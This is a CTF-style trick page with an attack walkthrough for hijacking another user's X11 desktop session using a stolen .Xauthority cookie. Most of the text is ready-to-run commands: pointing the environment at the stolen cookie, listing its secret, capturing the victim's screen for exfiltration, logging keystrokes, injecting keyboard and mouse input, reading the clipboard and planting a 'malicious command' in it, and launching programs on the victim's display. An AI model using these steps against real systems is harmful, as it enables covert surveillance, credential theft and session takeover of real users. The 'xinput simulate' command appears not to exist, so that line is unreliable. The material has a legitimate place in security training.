> For the complete documentation index, see [llms.txt](https://sarpers-organization.gitbook.io/ctftricks/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://sarpers-organization.gitbook.io/ctftricks/_chapter-intro-14/linux/trick-0047.md).

# X11 Display Abuse via .Xauthority Cookie

***

To abuse an X11 display using a stolen `.Xauthority` file, you need to obtain the target user's `.Xauthority` file and know the active display number. `.Xauthority` files are typically located in the user's home directory (`~/.Xauthority`). The active display number is often `:0` for the primary console session, but can vary. It can sometimes be found using tools like `w` or `who`. The `who` command can show the display associated with logged-in users.

Once you have the `.Xauthority` file locally or accessible, point your environment to use it and the correct display.

```bash
export XAUTHORITY=/path/to/stolen/.Xauthority
export DISPLAY=:0 # Or the correct display number
```

The `.Xauthority` file contains authentication data used by the X server. You can inspect its contents using the `xauth` command. For example, to list the entries associated with the display:

```bash
xauth list $DISPLAY
```

This command shows the display name, the authentication protocol (e.g., `MIT-MAGIC-COOKIE-1`), and the secret key.

Now you can execute X11 commands within the victim's session context. For example, to capture the screen contents:

```bash
xwd -root -screen -silent -display $DISPLAY > /tmp/screenshot.xwd
```

The generated `.xwd` file can then be transferred off the target and converted to a standard image format (e.g., PNG) using tools like `convert` (from ImageMagick).

```bash
convert /tmp/screenshot.xwd /tmp/screenshot.png
```

Beyond screen capture, you can execute various graphical commands or launch applications within the compromised session.

To simulate keyboard and mouse input, you can use tools like `xinput` or `xdotool`:

```bash
xinput list # List devices to find the keyboard/mouse ID
xinput test <device_id> # Monitor device events (e.g., keyboard presses)
xinput simulate <device_id> <keycode> # Simulate key press
```

Using `xdotool` provides more scripting capabilities for automation:

```bash
xdotool key ctrl+alt+t # Open terminal
xdotool type "ls -l /" # Type command into terminal
xdotool mousemove 100 100 click 1 # Move mouse and click
```

To interact with the clipboard:

```bash
xclip -selection clipboard -o # Read clipboard content
echo "malicious command" | xclip -selection clipboard # Write to clipboard
```

You can also use `xev` to capture information about X events, which can be useful for understanding interactions within the session.

Arbitrary graphical applications can be launched directly, appearing on the victim's screen:

```bash
firefox # Launch browser
xterm # Launch terminal emulator
```
